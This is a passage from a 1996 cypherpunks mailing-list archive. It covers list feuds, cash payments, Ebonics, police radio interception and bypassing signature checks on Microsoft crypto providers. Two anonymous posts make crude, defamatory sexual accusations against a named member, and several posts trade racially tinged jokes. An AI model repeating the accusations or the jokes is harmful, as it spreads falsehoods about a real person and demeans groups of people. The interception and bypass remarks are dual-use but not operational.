and find out what sites they have been visiting, to confirm whether 
or not they are of an 'acceptable' frame of mind.

Sincerely,
  Toto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Tue, 24 Dec 1996 03:33:35 -0800 (PST)
To: Ross Wright <rwright@adnetsol.com>
Subject: The LIST
In-Reply-To: <199612230801.AAA24862@adnetsol.adnetsol.com>
Message-ID: <32BFD210.146C@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Ross Wright wrote:
> 
> Yes, Dr., this latest tripe that has spewed forth from Tim's keyboard
> reeks of bigotry.  And all this time I felt you may have been too
> hard on him.  This latest rant of his has made me reconsider your
> rough treatment of Mr. May.  I kinda think he deserves a slapping
> right now.

  Supporting Dr. DV K, are we?
  OK, pal, now your on the LIST, too.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Tue, 24 Dec 1996 03:31:52 -0800 (PST)
To: Alec <camcc@abraxis.com>
Subject: Re: Pretty Lousy Privacy
In-Reply-To: <3.0.32.19961223213942.006982e8@smtp1.abraxis.com>
Message-ID: <32BFD547.3A1A@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Alec wrote:
> I have not been sucessful producing my fingerprint with PLP though I
> am certain it has been installed correctly.
> 
> What does one look like?  I mean, how will I know I have a
> fingerprint; oh, you know!

Alec,
  There is an Example below:

 -----BEGIN PLP SIGNATURE-----
 Version: 1.0 gamma
	Enter Full Name: Carl Johnson
	Enter Password: minimumsecurity
	Enter Residence Address: 709 Security Place, ButtFuck, Saskatchewan
	Does Your Home Contain Valuables: Yes
	When Do You Start Your Vacation: Feb. 9th
	How Long Will You Be Away: Two weeks 
 -----END PLP SIGNATURE-----

  Hope this has been of help.

Toto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Tue, 24 Dec 1996 03:31:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: that cyber holiday card...
In-Reply-To: <199612231821.NAA22877@hamp.hampshire.edu>
Message-ID: <32BFD92E.1283@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Gary Raynes wrote:
> 
> Teri Zuckerman <tzuckerman@hampshire.edu> wrote:
> >
> > To whomever sent that electronic card... I fwd. it to a friend of mine, and
> > now it's wrecking his hard drive! please respond...
> >
> > -Teri
> 
>  Wow! I'm sorry. I did check it for a virus with 2 different anti-virus
> programs before I sent it to anyone.
>  I'll see what I can find out about it and get back to you .
> Has anyone else had any problems like that?
>    Gary R.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 24 Dec 1996 04:28:13 -0800 (PST)
To: grafolog@netcom.com (jonathon)
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <Pine.SUN.3.95.961224080613.9113C-100000@netcom12>
Message-ID: <199612241223.HAA14556@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


jonathon wrote:
| On Mon, 23 Dec 1996, Steve Schear wrote:
| 
| > If you want hassle-free shopping use legal tender (except for rentals>
| 
| 	Not always true.
| 
| 	Go shopping with a wad of $100.00 bills.   Most stores don't
| 	accept them, regardless of the amount of purchase, without
| 	additional ID.   

	Did they require statist ID?  (Speaking of which, is a state
university student ID considered 'government issued?'  How about a
faculty or staff ID card?)


Adam
"Never had a problem paying with hundreds either.  Maybe its my 'You
will need to get your manager' attitude."

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Tue, 24 Dec 1996 00:13:03 -0800 (PST)
To: Steve Schear <azur@netcom.com>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <v02140b00aee4c78e10b1@[10.0.2.15]>
Message-ID: <Pine.SUN.3.95.961224080613.9113C-100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Dec 1996, Steve Schear wrote:

> If you want hassle-free shopping use legal tender (except for rentals>

	Not always true.

	Go shopping with a wad of $100.00 bills.   Most stores don't
	accept them, regardless of the amount of purchase, without
	additional ID.   

	Try buying a new car, paying for it with $100.00 bills.
	You might enjoy filling out the paperwork that is required
	to do so.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Tue, 24 Dec 1996 08:07:48 -0800 (PST)
To: Ross Wright <toto@sk.sympatico.ca
Subject: Re: The LIST
Message-ID: <199612241607.IAA01879@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 24 Dec 96 at 4:52, Carl Johnson wrote:

> Ross Wright wrote:
> > 
> > Yes, Dr., this latest tripe that has spewed forth from Tim's
> > keyboard reeks of bigotry.  And all this time I felt you may have
> > been too hard on him.  This latest rant of his has made me
> > reconsider your rough treatment of Mr. May.  I kinda think he
> > deserves a slapping right now.
> 
>   Supporting Dr. DV K, are we?
>   OK, pal, now your on the LIST, too.

Not the first "LIST" I've been "put" on.

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 24 Dec 1996 05:47:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: MOD_ify
Message-ID: <1.5.4.32.19961224134346.006c9c20@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 12-23-96:

"White House Seeks Input on Electronic Commerce Policy"

  "A Framework for Global Electronic Commerce," will be
  available at: http://www.whitehouse.gov . The draft report does 
  not address in detail the Administration's policy on encryption.

"Vendors coalesce on encryption"

  An analyst said he expects the vendors "to get pretty inventive" 
  in circumventing rules, such as by reregistering their 
  headquarters in Bermuda if the regulations are perceived as 
  unworkable.

"Expert warns of lax security on Web"

  Dan Farmer, citing his just-completed study, says up to two-thirds 
  of certain Web sites, including reputable institutions like banks 
  and the media, are vulnerable to hacker attacks.

"ITAA Airs Concerns on Encryption Regs"

  ITAA asked President Clinton to intervene to modify the draft 
  regulations before they go into effect in any form.

-----

MOD_ify





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 24 Dec 1996 08:58:24 -0800 (PST)
To: toto@sk.sympatico.ca
Subject: Re: Unsubscribing Dr. Vulius
In-Reply-To: <T59eZD46w165w@bwalk.dm.com>
Message-ID: <32C00B59.7FD1@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson wrote:
> > ]To: cypherpunks@toad.com, gnu@toad.com
> > ]Subject: Dr. Vulis is not on cypherpunks any more
> > ]From: John Gilmore <gnu@toad.com>
> > ]As stated by Dr. Vulis, he is no longer on the cypherpunks mailing
> > ]list, and indeed majordomo@toad.com HAS been instructed to ignore his
> > ]requests to resubscribe.
> > ]The cypherpunks list is for discussions centered around cryptography.

> I agree totally.  My friends in Berkeley agree that cryptography
> discussions should stick to more relevant topics, like Ebonics.[snip]
> Our topic of discussion tomorrow will be, "Censorship / The 'Final
> Solution' to Dr. DV K, Or Just 'Attack Cryptography'?"
> I am sure that your actions in regard to Dr. Vulius will be a strong
> message to other CypherPunks that they had better toe-the-line, or else.[snip]

Be careful, Carl.  The last guy ("George the Greek") on the list who
dared show this much audacity/humor has disappeared. I hope he's safe
wherever he is, but then again, I wouldn't hold my breath. After all,
this is a crypto list, and there are all those NSA spooks watching
everything we do....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Tue, 24 Dec 1996 05:54:28 -0800 (PST)
To: mjmiski@execpc.com (Matthew J. Miszewski)
Subject: Re: Ebonics
In-Reply-To: <3.0.32.19961223152042.006b5024@mail.execpc.com>
Message-ID: <199612241405.JAA16350@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


Matthew J. Miszewski writes:

> At 08:55 AM 12/23/96 -0500, Jeff Barber wrote:
> >I've never seen Tim "advocate the unemployment" of anyone or any group.
> 
> Funny, did he stutter when he said he regularly *practiced* such
> discrimination at Intel?

Matt, buy a dictionary.  "Practicing discrimination" is not the same 
as "advocating unemployment".

I guess when I decline to hire you as my lawyer, I'll be "advocating your
unemployment?"


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Tue, 24 Dec 1996 06:09:21 -0800 (PST)
To: "'jonathon'" <grafolog@netcom.com>
Subject: RE: Legality of requiring credit cards?
Message-ID: <01BBF17A.1E08ADD0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


jonathon wrote:
> 	Go shopping with a wad of $100.00 bills.   Most stores don't
> 	accept them, regardless of the amount of purchase, without
> 	additional ID.   

I bought a new PC a few months ago with just shy of $7K worth of
$100 bills.  No one even blinked.

regards,
-Blake (cash is good)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 08:10:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <Pine.LNX.3.95.961223202858.10058A-100000@user1.scranton.com>
Message-ID: <Fi3FZD48w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Moroni <moroni@scranton.com> writes:
...
>      Maybe , the answer to all our problems is to draft a privacy bill in
> varous forms and stages and each member of the list submit it to his or
> her representative,congressman or senator. That is something that can
> legally be done and it is practical. I say stages because what we want
> will never pass the first time in its  entirety BUT we could conceiveably
> get something started.
...

Fucking statists! But if you do, take a look at the privacy laws in Europe,
they go much farther than the laws here.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Tue, 24 Dec 1996 09:13:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Zero-knowledge interactive proofs
Message-ID: <199612241713.JAA29543@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone else wonder how the good Dr. comes by such intimate knowledge of Tim May's physical characteristics and personal behaviour?

I have some ideas, but I am too tasteful to share them.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 24 Dec 1996 09:15:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <199612241223.HAA14556@homeport.org>
Message-ID: <32C00F42.6A95@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> jonathon wrote:
> | On Mon, 23 Dec 1996, Steve Schear wrote:
> | > If you want hassle-free shopping use legal tender (except for rentals>

> |   Not always true. Go shopping with a wad of $100.00 bills.
> |   Most stores don't accept them, regardless of the amount of purchase,
> |   without additional ID.

> Did they require statist ID? (Speaking of which, is a state university
> student ID considered 'government issued?' How about a faculty or staff ID card?)
> "Never had a problem paying with hundreds either.  Maybe its my 'You
> will need to get your manager' attitude."

It's been my experience in the L.A. area as well as elsewhere in the
U.S. that stores will take hundreds if the purchase is a significant
fraction of a $100 bill, or more than $100.  I've also found that
restaurants, for example, will nearly always take a $100 if the check
is over $20, and some will take it when the check is less than $20.
Common sense is the key, i.e., if the tab is $101, and you give them
two $100 bills, expecting $99 change, expect some static.

In spite of the brainwashed multitudes' attitudes about carrying cash,
and standing like beggars in an ATM line where muggers are prowling
nearby, the L.A. authorities actually urge(!) people to carry a few
hundred dollars at least in case of earthquake or other emergency.

Recently when I was in my bank drawing out some cash and getting change
(in a way that I suppose customers don't normally do), the teller made
a snide remark about my habits, so I raised my voice and said "Remember
the adage 'possession is 9/10 of the law?', well, when you possess my
money it's really your money, and I don't like that.  I'm withdrawing
my money, OK?"  That was the one and only time they made any remarks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 08:12:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <Pine.NEB.3.95.961223232514.20349A-100000@localhost>
Message-ID: <8q3FZD49w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


<META NAME="crypto-relevance" CONTENT="0">

Jim Wise <jim@santafe.arch.columbia.edu> writes:

> What _has_ happened is that Ebonics has been added to the list of languages
> which some students are coming into the school program speaking better than
> they speak English.  Ebonics just goes alongside Spanish, several dialects
> of Chinese, and a number of other languages whose native speakers may get
> help from the school district in learning English.

In NYC you see occasional signs in severely corrupted French, which is
supposed to represent the dialect spoken by the inhabitants of Haiti,
many of whom actually strive to speak "correct" French, or at least
to spell it "correctly". (Note the quotes - I have no respect for the
academy or any other authority that presumes to decide what's "correct").

> I think this approach is foolishness, as it stigmatizes and seperates a
> group who are not already cut off from the rest of the community, unlike
> speakers of other designated languages.  (Unlike Laotian or Spanish, a
> `native speaker' of Ebonics can understand `standard' english).  This is
> a far cry from the `mandataed speaking of Ebonics' which CPunks seem so
> up in arms about.  No such program exists or has existed.

Maybe "Yebonics" (this sounds better in Russian - I'll let Igor translate)
is a step in the right direction to allow the English language to continue
its natural development and to become more like Chinese. I work sometimes
with folks from the Carribean who are well-educated but choose to speak
the dialect and frankly I find it more logical. Or maybe I just like these
guys and my perception is skewed.

"I be, we be, you be, he/she/it be, they be" - good.
"I go, he go" - good.
"I done go" instead of "I went" - good.
"Keyboard belong me" instead of "My keyboard" - good.
The last one is actually not Black English, but the Pigin English spoken
in papua-new guinea.

> At any rate, as someone already pointed out, the main reason for the
> designation of Ebonics as a language is that it overnight doubled the
> number of students whom Oakland can count towards federal matching funds
> for ESL...

In NYC a student with a Spanish surname will be forcibly put in ESL even
if neither s/he nor the parents speak a word of Spanish, or want to. It
brings more money to the school. (That's only in public schools, of course).
Expect black kids to be forced to stidy "ebonics" whether they want to or
not, while white kids will study something useful.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 24 Dec 1996 09:33:15 -0800 (PST)
To: die@die.com
Subject: Re: Lack of security of police Mobile Data Terminals (MDTs)
In-Reply-To: <9612240450.AA24404@pig.die.com>
Message-ID: <32C01377.11CF@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dave Emery wrote:
> Some months ago I posted an article to cypherpunks commenting
> on how easy it is to intercept the supposedly secret traffic on
> the Motorola mobile data terminals used by many police forces to access
> criminal history and other sensitive information.  This data is
> not seriously encrypted (or encrypted at all in most systems) and
> illustrates the kind of security by obscurity that some people would
> like to see continue as the only protection for such information as
> it is broadcast to the world on open radio channels.

You've raised a point that is similar to the issues raised in FOIA
requests.  Is the reason I can't get certain documents because the
govt. is hiding something, or is it because they have to protect
"sources and methods"?  Now I understand the dispute on "methods",
but sources are often real people, whose identity may have to be
protected.

My question then, if police go 100% to secure transmissions, is that
a good thing for the public?  To be totally locked out of the ability
to monitor the police?  Of course, since I have an AOR AR-8000, with
even the forbidden cellular aliased out to the 1400 mhz area, I can
intercept anything and decode it (some problems with frequency-hopping
on cellular and some trunked frequencies), if there are no unusual
security methods used.

>From my experience so far, most of the public needs to worry about:

1. Doing business on cellular and other portable phones, where pirates
   are busy snooping.

2. Using a "security" company to watch your house when you're gone,
   since they generally talk openly on common scanner frequencies.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Tue, 24 Dec 1996 09:45:45 -0800 (PST)
To: Blake Coverett <blake@bcdev.com>
Subject: RE: Legality of requiring credit cards?
In-Reply-To: <01BBF17A.1E08ADD0@bcdev.com>
Message-ID: <Pine.LNX.3.95.961224094152.436A-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


I think this is yet another difference between Canada and the USofA, I
too have used $100 bills to pay for things quite often. The only time
there has been a problem is when the amount of the purchase is less than
$20.00 (and then its only because few stores keep that much change
around). 

Isn't the problem a result of the War On Drugs? 

cheers, kinch






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 08:10:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <199612240213.SAA22150@netcom7.netcom.com>
Message-ID: <kg5FZD55w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


While on the subject of Yebonics:

The following funny (what else) article just showed up in my rec.humor.funny:

]From: feuer@netcom.com (Ted Feuerbach)
]Newsgroups: rec.humor.funny
]Subject: Ebonics: Other New Dialects
]Keywords: topical, smirk, stereotypes
]Message-ID: <Sa7e.25b1@clarinet.com>
]Date: Tue, 24 Dec 96 3:20:01 EST
]Lines: 26
]Approved: funny-request@clari.net
]
]With the Oakland (California) School District accepting Ebonics
](Black English) as a Second Language, I decided that speakers of
]other dialects will want theirs too.
]
]People from:  West Virginia  - Hillbonics
]
]              Jamaica        - Mononics
]
]              Scotland       - Hootmononics
]
]              The Southwest  - Hisponics
]
]              Texas          - JoeBonics
]
]              Extreme North  - Eh?onics
]
]
]The whole concept:  Moronics
]
]--
]Selected by Jim Griffith.  MAIL your joke to funny@clari.net.
]The "executive moderator" is Brad Templeton.
]
]Please!  No copyrighted stuff.  Also no "mouse balls," dyslexic agnostics,
]Clinton/Yeltsin/Gates meets God, or "OJ will walk" jokes.  For the full
]submission guidelines, see http://comedy.clari.net/rhf/

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Topalovich <TOPALOVICH@terraglyph.com>
Date: Tue, 24 Dec 1996 07:55:36 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Legality of requiring credit cards?
Message-ID: <c=US%a=_%l=TGIEXCH-961224155706Z-2446@TGIEXCH.terraglyph.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>	Not always true.
>
>	Go shopping with a wad of $100.00 bills.   Most stores don't
>	accept them, regardless of the amount of purchase, without
>	additional ID.   
>
>	Try buying a new car, paying for it with $100.00 bills.
>	You might enjoy filling out the paperwork that is required
>	to do so.  
>

It's not necessarily because you are paying with $100 bills.  The IRS
requires banks and other businesses to report all cash transactions
exceeding $10,000 by means of a Currency Transaction Report (CTR).  This
is a way for the IRS to track money laundering.  There happens to be two
lines on the form asking for the number of $50 and $100 bills, but those
lines are optional.

Mike
topalovich@terraglyph.com

>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Tue, 24 Dec 1996 10:21:41 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: The LIST
Message-ID: <199612241821.KAA04522@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 24 Dec 96 at 11:52, Dr.Dimitri Vulis KOTM wrote:

> Carl Johnson <toto@sk.sympatico.ca> writes:
> 
> > Ross Wright wrote:
> > >
> > > Yes, Dr., this latest tripe that has spewed forth from Tim's
> > > keyboard reeks of bigotry.  And all this time I felt you may
> > > have been too hard on him.  This latest rant of his has made me
> > > reconsider your rough treatment of Mr. May.  I kinda think he
> > > deserves a slapping right now.
> >
> >   Supporting Dr. DV K, are we?

On or About 24 Dec 96 at 11:52, Dr.Dimitri Vulis KOTM wrote:

> 
> Uh-oh - Ross, good buddy, we've been outed.

Yes, my tolerance of humanity has been brought to the forefront!  I 
can only hope it only goes as far as the "punks" on this list.  It 
would not look good for a salesman like myself to be known as a 
tolerant person.


> 
> >   OK, pal, now your on the LIST, too.
> 
> Do you mean Timmy May's "don't hire" list?

Oh, I think this is a much bigger "LIST".  I think the men with 
sunglasses and shiny black shoes are gonna show up soon...

Just cause I am paranoid doesn't mean that they aren't out to get me.

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham-John Bullers <real@freenet.edmonton.ab.ca>
Date: Tue, 24 Dec 1996 09:36:59 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: Zero-knowledge interactive proofs
In-Reply-To: <199612240717.XAA30847@mailmasher.com>
Message-ID: <Pine.A41.3.95.961224103433.53132A-100000@freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain





        http://www.freenet.edmonton.ab.ca/~real/index.html

                                          : real@freenet.edmonton.ab.ca
Graham-John Bullers                  email
                                          : ab756@freenet.toronto.on.ca


On Mon, 23 Dec 1996, Huge Cajones Remailer wrote:

> Timmy C. Mayo prefers to have sex with little 
> kids because his own penis is like that of a 
> three-year-old.
> 
>           \
>          o/\_ Timmy C. Mayo
>         <\__,\
>          '\,  |
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 24 Dec 1996 10:49:43 -0800 (PST)
To: markm@voicenet.com (Mark M.)
Subject: Re: Ebonics
In-Reply-To: <Pine.LNX.3.95.961224125036.581B-100000@gak.voicenet.com>
Message-ID: <199612241847.KAA24854@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. writes:
> 
>It's extremely trivial to prevent someone from posting to a mailing list.  The
>fact that John Gilmore has not done this probably means that he doesn't want to
> rather than an inability to do the above.

Short of 1) moderating the list or 2) restricting new subscriptions to the
list, it's almost impossible to prevent someone from posting to a
mailing list.  As soon as you "block" posts from one address, the
determined poster can sign up from another address.  All it takes
is paying money to a few ISPs, or changing his AOL userid.

The determined poster could even grab a subscriber list from the lists's
mailserver, and send his message to each member individually.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Tue, 24 Dec 1996 09:20:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: usenet censorship]
Message-ID: <32C0262C.1BDE@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: message/news


Subject: usenet censorship
From: Hootman <lewis@cyberstreet.com>
Date: Tue, 24 Dec 1996 10:16:54 -0500
Newsgroups: news.newusers.questions
Organization: LiveNet, Inc.
Reply-To: lewis@cyberstreet.com

Does anyone know of a server that allows uncensored news groups, mine
censors all alt. groups.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 24 Dec 1996 12:05:22 -0800 (PST)
To: Norman Hardy <stewarts@ix.netcom.com>
Subject: Re: [PGP-USERS] Password Keystroke Snarfer Programs (passphrase  protection)
In-Reply-To: <v03100b27aedeb335e709@[204.179.135.28]>
Message-ID: <v03007810aee5d911ac16@[206.217.121.78]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 PM -0800 12/23/96, Norman Hardy wrote:
>... Second
>they must not be encumbered with piles of tools written by people with
>no sense of security. Such tools are often installed with more authority
>than they should require. There is a Unix system call that displays the
>most recent command that any user has typed. This call is used by the
>ps command to describe the origin of a task.
>
>Perhaps NT is new enough that it hasn't gathered all of these holes.
>I don't use NT so I wouldn't know.

NT 4.0 has a similar tool.


-------------------------------------------------------------------------
Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
(408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 24 Dec 1996 08:16:10 -0800 (PST)
To: Blake Coverett <blake@bcdev.com>
Subject: RE: Legality of requiring credit cards?
In-Reply-To: <01BBF17A.1E08ADD0@bcdev.com>
Message-ID: <Pine.BSF.3.91.961224111521.20821L-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, Blake Coverett wrote:

> jonathon wrote:
> > 	Go shopping with a wad of $100.00 bills.   Most stores don't
> > 	accept them, regardless of the amount of purchase, without
> > 	additional ID.   
> 
> I bought a new PC a few months ago with just shy of $7K worth of
> $100 bills.  No one even blinked.
> 
> regards,
> -Blake (cash is good)
> 
Remember that if you go over 10K, the recipient is supposed to file a 
form 8300 with the IRS ....

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Tue, 24 Dec 1996 12:06:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Hash functions
Message-ID: <199612241927.LAA12625@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C. May uses an Adolf Hitler action figure as a dildo.

         \|/
        (*,*) Tim C. May
       _m_-_m_





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 08:52:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <199612241405.JAA16350@jafar.issl.atl.hp.com>
Message-ID: <799FZD60w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Barber <jeffb@issl.atl.hp.com> writes:

> Matthew J. Miszewski writes:
>
> > At 08:55 AM 12/23/96 -0500, Jeff Barber wrote:
> > >I've never seen Tim "advocate the unemployment" of anyone or any group.
> >
> > Funny, did he stutter when he said he regularly *practiced* such
> > discrimination at Intel?
>
> Matt, buy a dictionary.  "Practicing discrimination" is not the same
> as "advocating unemployment".
>
> I guess when I decline to hire you as my lawyer, I'll be "advocating your
> unemployment?"

Suppose you want to hire a C coder and practice discrimination against
the candidates who don't know any C. Do you advocate their unemployment?
Do you even care, as long as you don't have to pay their salary?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Tue, 24 Dec 1996 12:12:09 -0800 (PST)
To: blake@bcdev.com (Blake Coverett)
Subject: Re: [NOT NOISE] Microsoft Crypto Service Provider API
In-Reply-To: <01BBF127.ACD7C120@bcdev.com>
Message-ID: <961224.113652.8U1.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, blake@bcdev.com writes of the MS CSPAPI and
signatures:

> More interesting would be the OS patch that allows an unsigned 
> (or signed by someone other than MS) CSP to be loaded...

Agreed.

> Hmm, logically the patch must be built in and only need to be 
> switched on as it would be too annoying to debug a CSP if you
> needed to get it signed every time you built a new version.

Not quite.  The API comes with a program SIGN.EXE that will create a
"debugging signature" for your CSP, and a new ADVAPI32.DLL, described as
a "Modified advapi32.dll to load providers that are signed with
sign.exe."  So the patch point is a bit more accessable than inside the
kernel.  Maybe the "Modified advapi32.dll" should find its way offshore?

> Microsoft's Authenticode system had such a patch at one time
> for just that purpose, and all it required was a registry setting.

Interestingly enough, CSP signatures are held in the registry instead of
the binary, necessitating some install procedure for a given CSP.  Not
to start rumors, but NT 4.0 does use threads to watch some registry
entries that control the version (workstation/server).  Not much of a
stretch to imagine a thread that tracks (reports?) changes to
HKEY_LOCAL_MACHINE
    SOFTWARE
        Microsoft
            Cryptography
                Defaults
                    Provider
                        ...
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMsAbhhvikii9febJAQEQwAQAuasIE2nEXiLlukBTRWoOFgdJa4jZh/MF
Ql0OxvKXbpKzFodE+O56An7ulH/tkfmXUd9E6xVtO6Z/AcrqN284ZPJmcbsR5cYB
KBhcHAc4JbFlUxpSu8iTM5B4seMwQrl9PmxN43q7GDq07NSbKZYkQ7ljwcTnULoQ
9I5gjyirmTc=
=J0eC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 09:22:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Both John Gilmore and Ray Arachelian are liars
In-Reply-To: <Pine.SUN.3.91.961224113856.19793B-100000@beast.brainlink.com>
Message-ID: <XL0FZD61w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> Right, I agree that you have been removed from majordomo's list of
> "subscribers" however you haven't been removed in as much as you can
> still read the list and in as much as you can post messages.

